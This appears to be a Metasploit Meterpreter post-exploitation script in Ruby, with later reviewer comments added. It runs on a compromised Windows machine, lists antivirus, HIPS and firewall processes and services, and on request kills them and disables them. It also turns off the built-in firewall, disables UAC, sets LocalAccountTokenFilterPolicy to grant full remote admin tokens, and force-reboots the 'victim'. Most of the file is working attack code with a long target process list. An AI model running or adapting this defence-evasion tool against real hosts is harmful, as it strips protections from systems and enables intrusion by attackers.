- # $Id: getcountermeasure.rb 10277 2010-11-18 21:26:27Z darkoperator / spudgunman $
- #
- # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
- # Provides also the option to kill the services and processes of detected products and disable the built-in firewall.
- # Provided by Carlos Perez at carlos_perez[at]darkoperator.com
- # Script Updated by Kelly Keeton<kellykeeton [at] hotmail>
- # Includes killav.rb process list by Jerome Athias <jerome.athias [at] free.fr>
- # Version: 0.2.5
# Meterpreter session handle. The helper methods further down take it as an
# explicit parameter: a top-level local like this one is not visible inside
# a `def`.
session = client
# Switches accepted by the script; every one is a bare boolean flag.
flags = {
  "-h" => [ false, "Help menu." ],
  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall services and process found." ],
  "-d" => [ false, "Disable built in Firewall" ],
  "-u" => [ false, "Disable User Access Control (UAC)" ],
  "-r" => [ false, "Force a reboot of the victim" ]
}
@@exec_opts = Rex::Parser::Arguments.new(flags)
# Print the help banner plus the option table, then stop the script.
# Rex::Script::Completed is the normal early-exit signal for Meterpreter
# scripts, not an error condition.
def usage
  [
    "Getcountermeasure -- List (or optionally, kill) HIPS and AV",
    "services and processes, for windows systems.",
    "Show XP firewall rules, and display DEP and UAC policies"
  ].each { |banner_line| print_line(banner_line) }
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end
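#------------------------------------------------------------------------------
# Process image names to look for; compared case-insensitively against the
# running process list by check(). Entries that contain a space must escape it
# (%W splits on whitespace), which "scheduler daemon.exe" previously did not —
# it was silently turning into the two tokens "scheduler" and "daemon.exe".
#
# NOTE(review): this is a broad grab-bag, not a clean AV list. Besides AV, HIPS
# and firewall agents it carries stock Windows tools (taskmgr.exe, regedit.exe,
# msconfig.exe, netstat.exe, sfc.exe, msinfo32.exe, ...), analysis tools
# (ollydbg.exe, ethereal.exe, procdump.exe, lordpe.exe, ...) and names used by
# old malware (msblast.exe, kernel32.exe, system32.exe). With -k every match is
# killed, so expect collateral damage and check a hit before treating it as a
# countermeasure. Two entries (avktray, avkwctl) lack an extension and cannot
# match a Windows image name.
avs = %W{
_avp32.exe
_avpcc.exe
_avpm.exe
a2adguard.exe
a2adwizard.exe
a2antidialer.exe
a2cfg.exe
a2cmd.exe
a2free.exe
a2guard.exe
a2hijackfree.exe
a2scan.exe
a2service.exe
a2start.exe
a2sys.exe
a2upd.exe
aavgapi.exe
aawservice.exe
aawtray.exe
ackwin32.exe
adaware.exe
ad-aware.exe
advxdwin.exe
ad-watch.exe
agentsvr.exe
agentw.exe
alclient.exe
alertsvc.exe
alescan.exe
alevir.exe
alogserv.exe
amon9x.exe
anti-trojan.exe
antivirus.exe
ants.exe
anvir.exe
apimonitor.exe
aplica32.exe
apvxdwin.exe
arr.exe
ashdisp.exe
ashmaisv.exe
ashserv.exe
ashwebsv.exe
aswupdsv.exe
atcon.exe
atguard.exe
atrack.exe
atro55en.exe
atupdater.exe
atwatch.exe
au.exe
aupdate.exe
autodown.exe
auto-protect.nav80try.exe
autotrace.exe
autoupdate.exe
avconsol.exe
ave32.exe
avgagent.exe
avgamsvr.exe
avgcc.exe
avgcc32.exe
avgchsvx.exe
avgcsrvx.exe
avgctrl.exe
avgemc.exe
avgemcx.exe
AVGIDSAgent.exe
AVGIDSMonitor.exe
avgmfapx.exe
avgnsx.exe
avgnt.exe
avgrsx.exe
avgserv.exe
avgserv9.exe
avgtcpsv.exe
avgtray.exe
avguard.exe
avgui.exe
avgupsvc.exe
avgw.exe
avgwdsvc.exe
avk.exe
avkbar.exe
avkpop.exe
avkproxy.exe
avkserv.exe
avkservice.exe
avktray
avktray.exe
avkwctl
avkwctl.exe
avkwctl9.exe
avltmain.exe
avmailc.exe
avnt.exe
avp.exe
avp32.exe
avpcc.exe
avpdos32.exe
avpm.exe
avpmwrap.exe
avptc32.exe
avpupd.exe
avsched32.exe
avshadow.exe
avsynmgr.exe
avwebgrd.exe
avwin.exe
avwin95.exe
avwinnt.exe
avwupd.exe
avwupd32.exe
avwupsrv.exe
avxmonitor9x.exe
avxmonitornt.exe
avxquar.exe
avz.exe
backweb.exe
bargains.exe
bd_professional.exe
bdagent.exe
bdmcon.exe
bdnagent.exe
bdss.exe
bdswitch.exe
beagle.exe
belt.exe
bidef.exe
bidserver.exe
bipcp.exe
bipcpevalsetup.exe
bisp.exe
blackd.exe
blackice.exe
blink.exe
blss.exe
boc412.exe
boc425.exe
bocore.exe
bootconf.exe
bootwarn.exe
borg2.exe
bpc.exe
brasil.exe
bs120.exe
bundle.exe
bvt.exe
cavrid.exe
cavtray.exe
ccapp.exe
ccevtmgr.exe
ccimscan.exe
ccproxy.exe
ccpwdsvc.exe
ccpxysvc.exe
ccsetmgr.exe
ccSvcHst.exe
cdp.exe
cfd.exe
cfgwiz.exe
cfiadmin.exe
cfiaudit.exe
cfinet.exe
cfinet32.exe
cfp.exe
clamd.exe
clamservice.exe
clamtray.exe
claw95.exe
claw95cf.exe
clean.exe
cleaner.exe
cleaner3.exe
cleanpc.exe
click.exe
cmdagent.exe
cmesys.exe
cmgrdian.exe
cmon016.exe
connectionmonitor.exe
cpd.exe
cpf.exe
cpf9x206.exe
cpfnt206.exe
csinsmnt.exe
ctrl.exe
cv.exe
cwnb181.exe
cwntdwmo.exe
datemanager.exe
dcomx.exe
dcsuserprot.exe
defalert.exe
defensewall.exe
defensewall_serv.exe
defscangui.exe
defwatch.exe
deputy.exe
divx.exe
dllcache.exe
dllreg.exe
doors.exe
dpf.exe
dpfsetup.exe
dpps2.exe
drwatson.exe
drweb32.exe
drwebupw.exe
dssagent.exe
dvp95.exe
dvp95_0.exe
ecengine.exe
efpeadm.exe
emsw.exe
EngineServer.exe
ent.exe
esafe.exe
escanhnt.exe
escanv95.exe
espwatch.exe
ethereal.exe
etrustcipe.exe
evpn.exe
exantivirus-cnet.exe
exe.avxw.exe
expert.exe
explore.exe
f-agnt95.exe
FAMEH32.EXE
fast.exe
FCH32.EXE
FIH32.exe
findviru.exe
firewall.exe
FNRB32.exe
ForceField.exe
fpavupdm.exe
fprot.exe
f-prot.exe
f-prot95.exe
fp-win.exe
fp-win_trial.exe
FrameworkService.exe
frw.exe
fsaa.exe
fsaua.exe
fsav.exe
fsav32.exe
fsav530stbyb.exe
fsav530wtbyb.exe
fsav95.exe
f-sched.exe
fsdfwd.exe
fsgk32.exe
fsgk32st.exe
fsguidll.exe
FSLAUNCH.EXE
FSM32.EXE
FSMA32.EXE
FSMB32.EXE
fsqh.exe
fssm32.exe
f-stopw.exe
fwservice.exe
fwsrv.exe
gator.exe
gbmenu.exe
gbpoll.exe
generics.exe
gmt.exe
guard.exe
guarddog.exe
hacktracersetup.exe
hbinst.exe
hbsrv.exe
hotactio.exe
hotpatch.exe
htlog.exe
htpatch.exe
hwpe.exe
hxdl.exe
hxiul.exe
iamapp.exe
iamserv.exe
iamstats.exe
iao.exe
ibmasn.exe
ibmavsp.exe
icload95.exe
icloadnt.exe
icmon.exe
icsupp95.exe
icsuppnt.exe
idle.exe
idsinst.exe
idslu.exe
iedll.exe
iedriver.exe
iexplorer.exe
iface.exe
ifw2000.exe
inetlnfo.exe
inetupd.exe
infus.exe
infwin.exe
init.exe
intdel.exe
intren.exe
iomon98.exe
irsetup.exe
isafe.exe
isignup.exe
issvc.exe
istsvc.exe
ISWMGR.exe
ISWSVC.exe
jammer.exe
jdbgmrg.exe
jedi.exe
kav.exe
kavlite40eng.exe
kavpers40eng.exe
kavpf.exe
kavss.exe
kavsvc.exe
kazza.exe
keenvalue.exe
kerio-pf-213-en-win.exe
kerio-wrl-421-en-win.exe
kerio-wrp-421-en-win.exe
kernel32.exe
killprocesssetup161.exe
klswd.exe
kpf4gui.exe
kpf4ss.exe
launcher.exe
ldnetmon.exe
ldpro.exe
ldpromenu.exe
ldscan.exe
livesrv.exe
lnetinfo.exe
loader.exe
localnet.exe
lockdown.exe
lockdown2000.exe
lookout.exe
lordpe.exe
lpfw.exe
lsetup.exe
luall.exe
luau.exe
lucomserver.exe
luinit.exe
luspt.exe
mantispm.exe
mapisvc32.exe
mcagent.exe
mcdetect.exe
mcmnhdlr.exe
mcrdsvc.exe
mcshield.exe
mctool.exe
McTray.exe
mctskshd.exe
mcupdate.exe
mcvsrte.exe
mcvsshld.exe
md.exe
mfevtps.exe
mfin32.exe
mfw2en.exe
mfweng3.02d30.exe
mgavrtcl.exe
mgavrte.exe
mghtml.exe
mgui.exe
minilog.exe
mmod.exe
monitor.exe
moolive.exe
mostat.exe
mpfagent.exe
mpfservice.exe
mpftray.exe
mrflux.exe
msapp.exe
msascui.exe
msbb.exe
msblast.exe
mscache.exe
msccn32.exe
mscifapp.exe
mscman.exe
msconfig.exe
msdm.exe
msdos.exe
msfwsvc.exe
msgsys.exe
msiexec16.exe
msinfo32.exe
mslaugh.exe
msmgt.exe
msmsgri32.exe
mssmmc32.exe
msssrv.exe
mssys.exe
msvxd.exe
mu0311ad.exe
mwatch.exe
n32scanw.exe
nav.exe
navap.navapsvc.exe
navapsvc.exe
navapw32.exe
navdx.exe
navlogon.dll
navlu32.exe
navnt.exe
navstub.exe
navw32.exe
navwnt.exe
nc2000.exe
ncinst4.exe
ndd32.exe
neomonitor.exe
neowatchlog.exe
netarmor.exe
netd32.exe
netinfo.exe
netmon.exe
netscanpro.exe
netspyhunter-1.2.exe
netstat.exe
netutils.exe
nisemsvr.exe
nisserv.exe
nisum.exe
nmain.exe
noads.exe
nod32.exe
nod32krn.exe
nod32kui.exe
nod32ra.exe
normist.exe
norton_internet_secu_3.0_407.exe
notstart.exe
npf40_tw_98_nt_me_2k.exe
npfmessenger.exe
npfmntor.exe
nprotect.exe
npscheck.exe
npssvc.exe
nsched32.exe
nsmdtr.exe
nssys32.exe
nstask32.exe
nsupdate.exe
nt.exe
ntrtscan.exe
ntvdm.exe
ntxconfig.exe
nui.exe
nupgrade.exe
nvarch16.exe
nvc95.exe
nvsvc32.exe
nwinst4.exe
nwservice.exe
nwtool16.exe
oasclnt.exe
ofcdog.exe
ollydbg.exe
onsrvr.exe
opscan.exe
optimize.exe
ostronet.exe
otfix.exe
outpost.exe
outpostinstall.exe
outpostproinstall.exe
paamsrv.exe
padmin.exe
panixk.exe
patch.exe
pavcl.exe
pavfnsvr.exe
pavproxy.exe
pavsched.exe
pavw.exe
pcclient.exe
pccpfw.exe
pccwin98.exe
pcfwallicon.exe
pcip10117_0.exe
pcscan.exe
pdsetup.exe
periscope.exe
persfw.exe
perswf.exe
pf2.exe
pfwadmin.exe
pgmonitr.exe
pingscan.exe
platin.exe
pop3trap.exe
poproxy.exe
popscan.exe
portdetective.exe
portmonitor.exe
powerscan.exe
ppinupdt.exe
pptbc.exe
ppvstop.exe
prizesurfer.exe
prmt.exe
prmvr.exe
procdump.exe
processmonitor.exe
procexplorerv1.0.exe
programauditor.exe
proport.exe
protector.exe
protectx.exe
ProToolbarUpdate.exe
pspf.exe
purge.exe
qconsole.exe
qdcsfs.exe
qserver.exe
rapapp.exe
rav7.exe
rav7win.exe
rav8win32eng.exe
ray.exe
rb32.exe
rcsync.exe
realmon.exe
reged.exe
regedit.exe
regedt32.exe
rescue.exe
rescue32.exe
rrguard.exe
rshell.exe
rtvscan.exe
rtvscn95.exe
rulaunch.exe
run32dll.exe
rundll.exe
rundll16.exe
ruxdll32.exe
sadblock.exe
safe.exe
safeweb.exe
sahagent.exe
sandboxieserver.exe
save.exe
savenow.exe
savscan.exe
sbiectrl.exe
sbiesvc.exe
sbserv.exe
scam32.exe
scan32.exe
scan95.exe
ScanningProcess.exe
scanpm.exe
scfservice.exe
sched.exe
schedm.exe
scheduler\ daemon.exe
scrscan.exe
sdhelp.exe
serv95.exe
setup_flowprotector_us.exe
setupvameeval.exe
sfc.exe
SfCtlCom.exe
sgbhp.exe
sgmain.exe
sgssfw32.exe
sh.exe
shellspyinstall.exe
shn.exe
showbehind.exe
slee503.exe
smartfix.exe
smc.exe
SmcGui.exe
sms.exe
smss32.exe
snoopfreesvc.exe
snoopfreeui.exe
soap.exe
sofi.exe
sp_rsser.exe
spbbcsvc.exe
sperm.exe
spf.exe
sphinx.exe
spoler.exe
spoolcv.exe
spoolsv32.exe
spyblocker.exe
spybotsd.exe
spysweeper.exe
spysweeperui.exe
spywareguard.dll
spywareterminatorshield.exe
spyxx.exe
srexe.exe
srng.exe
ss3edit.exe
ssg_4104.exe
ssgrate.exe
ssu.exe
st2.exe
start.exe
stcloader.exe
steganos5.exe
stinger.exe
supftrl.exe
support.exe
supporter5.exe
svc.exe
svchostc.exe
svchosts.exe
svshost.exe
swdoctor.exe
sweep95.exe
swupdate.exe
symlcsvc.exe
symproxysvc.exe
symtray.exe
symundo.exe
symwsc.exe
symwscno.exe
sysedit.exe
system.exe
system32.exe
sysupd.exe
taskmg.exe
taskmgr.exe
taskmo.exe
taskmon.exe
taumon.exe
tbscan.exe
tc.exe
tca.exe
tcguard.exe
tcm.exe
tds2-98.exe
tds2-nt.exe
tds-3.exe
teatimer.exe
teekids.exe
tfak.exe
tfak5.exe
tgbbob.exe
tgbob.exe
tgbstarter.exe
titanin.exe
titaninxp.exe
TMBMSRV.exe
TmPFw.exe
TmProxy.exe
tracert.exe
trickler.exe
trjscan.exe
trjsetup.exe
trojantrap3.exe
tsadbot.exe
tsatudt.exe
tvmd.exe
tvtmd.exe
UFSeAgnt.exe
umxagent.exe
umxcfg.exe
umxfwhlp.exe
umxlu.exe
umxpol.exe
umxtray.exe
undoboot.exe
updat.exe
update.exe
UpdaterUI.exe
upgrad.exe
usrprmpt.exe
utpost.exe
vbcmserv.exe
vbcons.exe
vbust.exe
vbwin9x.exe
vbwinntw.exe
vcsetup.exe
vet32.exe
vet95.exe
vetmsg.exe
vetmsg9x.exe
vettray.exe
vfsetup.exe
vir-help.exe
virusmdpersonalfirewall.exe
vnlan300.exe
vnpc3000.exe
vpc32.exe
vpc42.exe
vpfw30s.exe
vptray.exe
vsaccess.exe
vscan40.exe
vscenu6.02d30.exe
vsched.exe
vsecomr.exe
vshwin32.exe
vsisetup.exe
vsmain.exe
vsmon.exe
vsserv.exe
vsstat.exe
VsTskMgr.exe
vswin9xe.exe
vswinntse.exe
vswinperse.exe
w32dsm89.exe
w9x.exe
watchdog.exe
wcantispy.exe
webdav.exe
webscanx.exe
webtrap.exe
wfindv32.exe
whoswatchingme.exe
wimmun32.exe
win32.exe
win32us.exe
winactive.exe
win-bugsfix.exe
window.exe
windows.exe
wininetd.exe
wininitx.exe
winlogin.exe
winmain.exe
winnet.exe
winpatrol.exe
winpatrolex.exe
winppr32.exe
winrecon.exe
winservn.exe
winssk32.exe
winstart.exe
winstart001.exe
wintsk32.exe
winupdate.exe
wkufind.exe
wnad.exe
wnt.exe
wradmin.exe
wrctrl.exe
wrsssdk.exe
wsbgate.exe
wupdater.exe
wupdt.exe
wyvernworksfirewall.exe
xcommsvr.exe
xfr.exe
xp-antispy.exe
xpf202en.exe
zapro.exe
zapsetup3001.exe
zatutor.exe
zegarynka.exe
zlclient.exe
zonalm2601.exe
zonealarm.exe
}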
#-------------------------------------------------------------------------------
# Service names to look for. These are the short "service name" values that
# sc/net stop accept, NOT the display names; check() compares them
# case-insensitively. Written as a plain string array so that names with a
# space (e.g. "Symantec AntiVirus") need no escaping.
# NOTE(review): wscsvc (Security Center), WinDefend and MsMpSvc are Microsoft's
# own components; stopping them is highly visible on the desktop.
avservices = [
  "avg9emc",
  "avg9wd",
  "AVGIDSAgent",
  "avgwd",
  "ccEvtMgr",
  "ccSetMgr",
  "FSAUA",
  "FSDFWD",
  "FSGKHS",
  "FSMA",
  "IswSvc",
  "McAfeeEngineService",
  "McAfeeFramework",
  "McShield",
  "McTaskManager",
  "mfevtp",
  "MsMpSvc",
  "SfCtlCom",
  "SmcService",
  "SNAC",
  "Symantec AntiVirus",
  "TMBMServer",
  "TmPfw",
  "TmProxy",
  "vsmon",
  "WinDefend",
  "wscsvc"
]
- #-------------------------------------------------------------------------------
- # Check for the presence of AV, HIPS and Third Party firewall and/or kill the
- # services and processes associated with it
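# Detect (and with killbit, stop) services and processes whose names appear in
# avservices / avs.
#
#   session    - Meterpreter session used for tasklist, process list and kills
#   avs        - process image names (matched case-insensitively)
#   avservices - short service names (matched case-insensitively)
#   killbit    - when true, disable+stop matching services and kill matching
#                processes; errors from a single kill are printed, not raised
#
# Detection is by name only, so a renamed or unlisted product is not seen,
# and the lists include stock Windows tools, so a "countermeasure" hit is a
# hint rather than proof. Killing is loud: sc/net stop and process kills
# are logged and usually re-spawned by the product's own watchdog.
def check(session,avs,avservices,killbit)
  spacer = "-------------------------------------------------------------------"
  if (killbit)
    print_error("\tTarget may require script re-ran and/or Reboot to fully remove countermeasure...")
  end

  # Snapshot the service table. `tasklist /svc /FO CSV` prints one line per
  # process: "image","pid","svc1,svc2,...". Folding CRLF into commas and
  # stripping the quotes leaves one token per image / pid / service name.
  # The whole channel is read before parsing: the original re-parsed inside
  # the read loop and so only ever kept the last chunk.
  raw = ""
  r = session.sys.process.execute("cmd.exe /c tasklist /svc /FO CSV", nil, {'Hidden' => 'true', 'Channelized' => true})
  while(chunk = r.channel.read)
    raw << chunk
  end
  r.channel.close
  r.close
  raw.gsub!(/\r\n?/,',')
  raw.gsub!('"','')
  svclist = raw.downcase.split(",").map { |t| t.strip }.reject { |t| t.empty? }

  #-----info or kill service
  avservicesclean = avservices.map{|i| i.downcase}
  print_status(spacer)
  print_status("Checking for Services...")
  svclist.each do |x|
    next unless avservicesclean.include?(x)
    print_status("\tPossible countermeasure service found #{x}")
    next unless killbit
    begin
      print_status("\t\tKilling service for countermeasure.....")
      # Quote the name: services such as "Symantec AntiVirus" contain a space
      # and would otherwise be split into two arguments by cmd.exe.
      k = session.sys.process.execute("cmd.exe /c sc config \"#{x}\" start= disabled & net stop \"#{x}\"", nil, {'Hidden' => 'true', 'Channelized' => true})
      k.channel.close
      k.close
    rescue => e
      print_error("\t\t#{e}")
    end
  end

  #-----info or kill process
  avsclean = avs.map{|i| i.downcase}
  print_status(spacer)
  print_status("Checking for Processes...")
  session.sys.process.get_processes().each do |x|
    next unless avsclean.include?(x['name'].downcase)
    print_status("\tPossible countermeasure process found #{x['name']} #{x['path']}")
    next unless killbit
    begin
      print_status("\t\tKilling process for countermeasure.....")
      session.sys.process.kill(x['pid'])
    rescue => e
      print_error("\t\t#{e}")
    end
  end
  print_status(spacer)
end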
- #-------------------------------------------------------------------------------
- # Get the configuration and/or disable the built in Windows Firewall
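# Show, or with killfw disable, the built-in Windows firewall via netsh.
#
#   session - Meterpreter session used to run netsh
#   killfw  - true: run `netsh firewall set opmode mode=DISABLE`;
#             false: print the output of `netsh firewall show opmode`
#   winvr   - OS string from sysinfo; kept for the callers, no longer needed
#             here because the Windows 7 and pre-7 branches were identical
#             copies of the same code and have been folded into one path.
#
# The "requires elevation" message from netsh is reported but not raised.
# NOTE(review): `netsh firewall` is the legacy XP/2003 context; Vista and
# later only keep it for compatibility and manage the per-profile state
# through `netsh advfirewall`, so on those targets this shows/changes the
# legacy view only.
def checklocalfw(session,killfw,winvr)
  print_status("Getting Windows Built in Firewall configuration...")
  opmode = ""
  if (killfw)
    print_status("\tDisabling Built in Firewall.....")
    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
    while(d = f.channel.read)
      if d =~ /The requested operation requires elevation./
        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
      end
    end
    f.channel.close
    f.close
  else
    r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
    while(d = r.channel.read)
      opmode << d
    end
    r.channel.close
    r.close
  end
  # Print whatever netsh reported (empty when killfw was set).
  opmode.split("\n").each do |o|
    print_status("\t#{o}")
  end
end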
- #-------------------------------------------------------------------------------
- # Function for getting the current DEP Policy on the Windows Target
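# Report the system DEP policy (Win32_OperatingSystem
# DataExecutionPrevention_SupportPolicy) by writing wmic output to a temp
# file, reading it back with `type`, then deleting it.
#
#   session - Meterpreter session; the temp file lives under its %TEMP%
#
# The original parsed the digit with tmpout.scan(/(\d)/).to_s, which gives
# "1" on Ruby 1.8 but '[["1"]]' on 1.9+, so no branch ever matched there;
# the first digit is now taken directly. An unparseable result is reported
# instead of printing nothing.
def checkdep(session)
  spacer = "-------------------------------------------------------------------"
  tmpout = ""
  # Expand environment %TEMP% variable
  tmp = session.fs.file.expand_path("%TEMP%")
  # Random 5-digit name for the wmic output file
  wmicfile = sprintf("%.5d",rand(100000))
  wmicout = "#{tmp}\\#{wmicfile}"
  print_status(spacer)
  print_status("Checking DEP Support Policy...")
  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
  # wmic is not channelized here; give it a moment to flush the file.
  # TODO(review): poll for the file instead of a fixed delay.
  sleep(2)
  r.close
  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
  while(d = r.channel.read)
    tmpout << d
  end
  r.channel.close
  r.close
  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true}).close
  depmode = tmpout[/\d/]
  case depmode
  when "0"
    print_status("\tDEP is off for the whole system.")
  when "1"
    print_status("\tFull DEP coverage for the whole system with no exceptions.")
  when "2"
    print_status("\tDEP is limited to Windows system binaries.")
  when "3"
    print_status("\tDEP is on for all programs and services.")
  else
    print_error("\tCould not determine the DEP policy from wmic output.")
  end
end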
- #-------------------------------------------------------------------------------
- #function to check or kill UAC
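# Report whether UAC is enabled (HKLM\...\Policies\System\EnableLUA == 1) and,
# with killuc, turn it off.
#
#   session - Meterpreter session (registry + process access)
#   killuc  - when true, set EnableLUA=0 and LocalAccountTokenFilterPolicy=1
#
# Security notes for the kill path:
#   * EnableLUA=0 only takes effect after a reboot.
#   * LocalAccountTokenFilterPolicy=1 disables UAC remote restrictions, i.e.
#     local administrator accounts get a full admin token over the network
#     (SMB/WMI) as well. That is a persistent weakening of the host beyond
#     the interactive UAC prompt; undo it when the engagement ends.
#   * reg.exe is run through a single `cmd.exe /c`. The original wrapped it
#     in a nested `cmd.exe /k`, which never exits and left a hidden cmd.exe
#     behind per call.
# Errors from the kill path are printed, not raised.
def checkuac(session,killuc)
  spacer = "-------------------------------------------------------------------"
  print_status(spacer)
  print_status("Checking if UAC is enabled ...")
  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
  root_key, base_key = session.sys.registry.splitkey(key)
  value = "EnableLUA"
  # Read-only handle for the check; released as soon as the value is read.
  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
  begin
    v = open_key.query_value(value)
  ensure
    open_key.close
  end
  if v.data != 1
    print_status("\tUAC is Disabled")
    return
  end
  print_status("\tUAC is Enabled")
  return unless killuc
  begin
    print_status("\tKilling UAC countermeasure.....")
    reg = "%windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
    kill1 = "#{reg} /v EnableLUA /t REG_DWORD /d 0 /f"
    kill2 = "#{reg} /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
    session.sys.process.execute("cmd.exe /c #{kill1}", nil, {'Hidden' => true}).close
    session.sys.process.execute("cmd.exe /c #{kill2}", nil, {'Hidden' => true}).close
    # Second route in case reg.exe was blocked: write through the registry
    # API with a write-capable handle (the KEY_READ handle above cannot set
    # a value).
    wkey = session.sys.registry.open_key(root_key, base_key, KEY_WRITE)
    begin
      wkey.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0)
    ensure
      wkey.close
    end
  rescue => e
    print_error("\t\t#{e}")
  end
end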
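# Force a reboot of the target when -r was given; the session dies with it.
#
#   killpc - true to reboot, false to do nothing
#   winvr  - OS string from sysinfo; picks "/" switches on Vista/7 and "-"
#            switches on older releases (both are forced restarts)
#
# Fixes against the original: the pre-Vista branch was an `elsif` nested
# inside the Vista/7 test, so it could never run; and the body used the
# top-level local `session`, which is not visible inside a method — `client`
# (already used at the top level of this script) is reachable here.
# TODO(review): confirm `client` resolves inside methods under the script
# runner in use. The log-off switch (/l, -l) is dropped: log-off and restart
# are distinct actions and only the restart is wanted.
def checkreboot(killpc,winvr)
  return unless killpc
  print_error("\tRebooting Victim PC your session will die.....")
  if winvr =~ /Windows Vista|Windows 7/
    client.sys.process.execute("cmd.exe /c shutdown /r /f", nil, {'Hidden' => true}).close
  else
    client.sys.process.execute("cmd.exe /c shutdown -r -f", nil, {'Hidden' => true}).close
  end
end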
- ################## MAIN ##################
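# Parse switches, then run the checks against a Windows session. The reboot
# is issued last: it kills the session, so in the original order (-r before
# the UAC step) `-u -r` could reboot before UAC was ever touched.
killbt = false
killfw = false
killuac = false
killpc = false
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-k"
    killbt = true
  when "-d"
    killfw = true
  when "-u"
    killuac = true
  when "-r"
    killpc = true
  when "-h"
    usage
  end
}
if client.platform =~ /win32|win64/
  # OS string from sysinfo drives the per-version branches below
  wnvr = session.sys.config.sysinfo["OS"]
  print_status("Running Getcountermeasure on the target...")
  check(session,avs,avservices,killbt)
  if wnvr !~ /Windows 2000/
    checklocalfw(session,killfw,wnvr)
    checkdep(session)
  end
  if wnvr =~ /Windows Vista|Windows 7/
    checkuac(session,killuac)
  end
  # Last: everything above must have run before the session is lost.
  if wnvr !~ /Windows 2000/
    checkreboot(killpc,wnvr)
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  print_status("Detected platform #{client.platform}")
  raise Rex::Script::Completed
end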